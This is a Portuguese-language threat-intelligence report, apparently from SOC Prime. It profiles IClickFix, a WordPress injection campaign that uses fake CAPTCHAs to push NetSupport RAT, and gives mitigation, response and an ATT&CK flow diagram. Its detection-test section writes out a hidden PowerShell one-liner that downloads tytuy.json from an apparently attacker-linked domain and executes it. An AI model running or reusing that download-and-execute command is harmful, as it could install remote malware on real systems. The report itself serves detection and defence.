SOC Prime Bias: Médio

03 Fev 2026 21:25

Conheça o IClickFix: um framework amplamente difundido que tem como alvo o WordPress utilizando a tática ClickFix

Author Photo
Ruslan Mikhalov Chefe de Pesquisa de Ameaças na SOC Prime linkedin icon Seguir
Conheça o IClickFix: um framework amplamente difundido que tem como alvo o WordPress utilizando a tática ClickFix
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

O relatório perfila IClickFix, um framework de JavaScript malicioso que compromete sites WordPress e apresenta um CAPTCHA falsificado no estilo do Cloudflare Turnstile. A armadilha coage os visitantes a executar um comando PowerShell que baixa e instala NetSupport RAT. A entrega é suportada por um sistema de distribuição de tráfego construído em torno do YOURLS encurtador de URL e um conjunto rotativo de domínios redirecionadores. Pesquisadores observaram mais de 3.800 sites WordPress comprometidos servindo essa cadeia globalmente desde o final de 2024.

Investigação

Analistas da Sekoia identificaram a tag JavaScript injetada ic-tracker-js em sites comprometidos e então reconstruíram o fluxo de redirecionamento através de múltiplos domínios de curta duração. Eles capturaram o padrão exato de execução do PowerShell usado para recuperar o payload final e recuperaram os componentes caídos do NetSupport RAT juntamente com indicadores de infraestrutura C2 associados.

Mitigação

Monitore o conteúdo da web para a ic-tracker-js injeção e bloqueie domínios maliciosos conhecidos, redirecionadores e serviços de links curtos usados na cadeia. Nos terminais, detecte padrões de download e execução do PowerShell consistentes com a armadilha ClickFix. Adicione cobertura para criação de arquivos do cliente NetSupport e para persistência através de Run chaves de registro no nível do usuário.

Resposta

Quando indicadores surgirem, isole o terminal, interrompa o processo ativo do PowerShell e remova os binários do NetSupport além de qualquer persistência baseada em registro. Siga com uma triagem forense completa para confirmar que o atacante não implantou implantes adicionais ou estabeleceu caminhos de acesso secundários.

graph TB %% Class Definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef file fill:#cccccc %% Action Nodes action_initial_access[“<b>Ação</b> – <b>T1190 Exploração de Aplicação Exposta ao Público</b><br/>Comprometimento de sites WordPress explorando vulnerabilidades do núcleo ou de plugins populares (Elementor, WooCommerce, Gravity Forms).”] class action_initial_access action action_content_injection[“<b>Ação</b> – <b>T1659 Injeção de Conteúdo</b><br/>Injeção de JavaScript malicioso contendo a tag <i>icu2011trackeru2011js</i> em páginas comprometidas para carregar scripts controlados pelo atacante.”] class action_content_injection action action_software_extensions[“<b>Ação</b> – <b>T1176 Extensões de Software</b><br/>Uso de plugins vulneráveis do WordPress como extensões para manter o código malicioso persistente no site.”] class action_software_extensions action action_dynamic_resolution[“<b>Ação</b> – <b>T1568 Resolução Dinâmica</b><br/>Uso do encurtador YOURLS e de uma cadeia de domínios (por exemplo, ksfldfklskdmbxcvb.com) para resolver e entregar cargas úteis enquanto filtra bots.”] class action_dynamic_resolution action action_obfuscated_payloads[“<b>Ação</b> – <b>T1027 Arquivos Ofuscados ou Armazenados</b><br/>Codificação do JavaScript de primeira etapa e do carregador PowerShell com Base64 e divisão de strings para evasão de detecção.”] class action_obfuscated_payloads action action_user_execution[“<b>Ação</b> – <b>T1204.001 Execução pelo Usuário: Link Malicioso</b><br/>As vítimas clicam na URL comprometida do WordPress, acionando a cadeia de redirecionamento.”] class action_user_execution action action_input_injection[“<b>Ação</b> – <b>T1674 Injeção de Entrada e T1204.004 Copiar-Colar Malicioso</b><br/>JavaScript grava um comando PowerShell na área de transferência e exibe um falso CAPTCHA Cloudflare Turnstile como isca.”] class action_input_injection action action_powershell[“<b>Ação</b> – <b>T1059.001 PowerShell</b><br/>Um comando PowerShell oculto é executado, baixa o script de segunda etapa <i>tytuy.json</i> e instala o NetSupport RAT.”] class action_powershell action action_persistence[“<b>Ação</b> – <b>T1547.014 Execução Automática na Inicialização ou Logon: Active Setup</b><br/>Criação de uma chave de registro Run apontando para <i>client32.exe</i> em ProgramData\\S1kCMNfZi3, garantindo execução na inicialização.”] class action_persistence action action_c2[“<b>Ação</b> – <b>T1102.002 Serviço Web: Comunicação Bidirecional</b><br/>O NetSupport RAT comunica-se via HTTPS com domínios controlados pelo atacante (por exemplo, nightlomsknies.com/fakeurl.htm).”] class action_c2 action action_data_obfuscation[“<b>Ação</b> – <b>T1001 Ofuscação de Dados</b><br/>Ofuscação do tráfego de comando e controle e das cargas úteis para ocultar a atividade maliciosa.”] class action_data_obfuscation action %% Tool / Malware / File Nodes tool_wordpress_core[“<b>Ferramenta</b> – <b>Nome</b>: Núcleo do WordPress<br/><b>Vulnerabilidade</b>: Execução remota de código”] class tool_wordpress_core tool tool_elementor_plugin[“<b>Ferramenta</b> – <b>Nome</b>: Plugin Elementor<br/><b>Vulnerabilidade</b>: Execução remota de código específica de CVE”] class tool_elementor_plugin tool tool_yourls[“<b>Ferramenta</b> – <b>Nome</b>: Encurtador YOURLS<br/><b>Propósito</b>: Redirecionamento de URL e resolução dinâmica”] class tool_yourls tool malware_netsupport[“<b>Malware</b> – <b>Nome</b>: NetSupport RAT<br/><b>Capacidade</b>: Controle remoto e exfiltração de dados”] class malware_netsupport malware file_client32[“<b>Arquivo</b> – <b>Nome</b>: client32.exe<br/><b>Localização</b>: ProgramData\\S1kCMNfZi3”] class file_client32 file file_tyuy_json[“<b>Arquivo</b> – <b>Nome</b>: tytuy.json<br/><b>Propósito</b>: Script PowerShell de segunda etapa”] class file_tyuy_json file %% Connections action_initial_access –>|explora| tool_wordpress_core tool_wordpress_core –>|fornece acesso| action_content_injection action_content_injection –>|injeta script usando| tool_elementor_plugin action_content_injection –>|leva a| action_software_extensions action_software_extensions –>|persiste via| tool_elementor_plugin action_software_extensions –>|habilita| action_dynamic_resolution action_dynamic_resolution –>|utiliza| tool_yourls action_dynamic_resolution –>|entrega| action_obfuscated_payloads action_obfuscated_payloads –>|produz| action_user_execution action_user_execution –>|aciona| action_input_injection action_input_injection –>|escreve comando na área de transferência| action_powershell action_powershell –>|baixa| file_tyuy_json file_tyuy_json –>|instala| malware_netsupport malware_netsupport –>|instala| action_persistence action_persistence –>|cria| file_client32 file_client32 –>|executado na inicialização| action_c2 malware_netsupport –>|comunica-se com| action_c2 action_c2 –>|usa| action_data_obfuscation

Fluxo de Ataque

Execução de Simulação

Pré-requisito: O Telemetria & Baseline Pre‑flight Check deve ter passado.

  • Narrativa e Comandos do Ataque:

    Um adversário que tem acesso inicial ao terminal deseja estabelecer uma presença permanente entregando o NetSupport RAT. Para evadir a detecção interativa, eles lançam o PowerShell em modo oculto sem perfil ou logo (-w hidden -nop -c). Eles então usam Invoke‑WebRequest (iwr) para baixar um payload JSON malicioso (tytuy.json) que contém um script PowerShell para o RAT. O script é escrito no diretório temporário e executado via Invoke‑Expression. Esta linha de comando exata corresponde às strings que a regra Sigma monitora.

  • Script de Teste de Regressão:

    # One-liner PowerShell que corresponde à regra de detecção
    $url = 'https://scottvmorton.com/tytuy.json'
    $out = "$env:TEMPpayload.ps1"
    
    powershell -w hidden -nop -c "iwr '$url' -OutFile $out; iex (Get-Content $out -Raw)"
  • Comandos de Limpeza:

    # Remove o payload baixado e qualquer processo PowerShell remanescente
    Remove-Item -Path "$env:TEMPpayload.ps1" -ErrorAction SilentlyContinue
    Get-Process -Name powershell | Where-Object {$_.CommandLine -match 'tytuy.json'} | Stop-Process -Force